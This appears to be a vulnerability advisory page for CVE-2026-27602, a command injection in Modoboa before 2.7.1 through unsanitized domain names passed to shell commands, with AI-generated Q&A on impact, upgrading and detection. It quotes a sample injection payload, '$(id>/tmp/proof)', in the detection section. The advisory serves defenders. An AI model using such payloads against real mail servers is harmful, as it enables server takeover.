CVE-2026-27602
Command Injection in Modoboa exec_cmd() via Unsanitized Domain Names
Publication date: 2026-03-25
Last updated on: 2026-03-26
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| modoboa | modoboa | to 2.7.1 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Modoboa, a mail hosting and management platform, in versions prior to 2.7.1. The function exec_cmd() in the file modoboa/lib/sysutils.py runs subprocess calls with shell=True, which means shell commands are executed directly. Domain names are inserted into these shell command strings without any sanitization. As a result, a Reseller or SuperAdmin can include shell metacharacters in a domain name, allowing them to execute arbitrary operating system commands on the server.
How can this vulnerability impact me? :
This vulnerability can have severe impacts because it allows privileged users (Reseller or SuperAdmin) to execute arbitrary OS commands on the server. This can lead to full compromise of the server, including unauthorized data access, data modification, service disruption, or further attacks on the infrastructure.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, you should upgrade Modoboa to version 2.7.1 or later, where the issue has been patched.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves OS command injection through unsanitized domain names or email addresses passed to shell commands in Modoboa versions prior to 2.7.1. Detection involves identifying if your Modoboa installation is running a vulnerable version and if suspicious domain names or mailbox addresses containing shell metacharacters have been created.
To detect exploitation attempts or presence of injected commands, you can check for unusual files or outputs created by injected commands, such as files in /tmp created by payloads like $(id>/tmp/proof).
Suggested commands to detect potential exploitation or suspicious activity include:
- Check for suspicious domain names or mailbox addresses containing shell metacharacters (e.g., $, `, ;, |) in the Modoboa database.
- Search for unexpected files created by injected commands, for example: `ls -l /tmp/proof` or other unusual files in /tmp or other writable directories.
- Review Modoboa logs for commands executed or errors related to subprocess calls.
- If you have access to the server, you can run commands like `ps aux | grep modoboa` to check running processes for suspicious command lines.
There are no specific detection commands provided in the resources, but monitoring for shell metacharacters in domain names and checking for unexpected files or command executions are practical approaches.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided context and resources do not include any information regarding the impact of CVE-2026-27602 on compliance with common standards and regulations such as GDPR or HIPAA.